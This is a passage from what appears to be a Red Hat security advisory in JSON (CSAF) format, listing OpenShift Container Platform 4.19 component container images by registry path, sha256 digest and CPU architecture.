"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
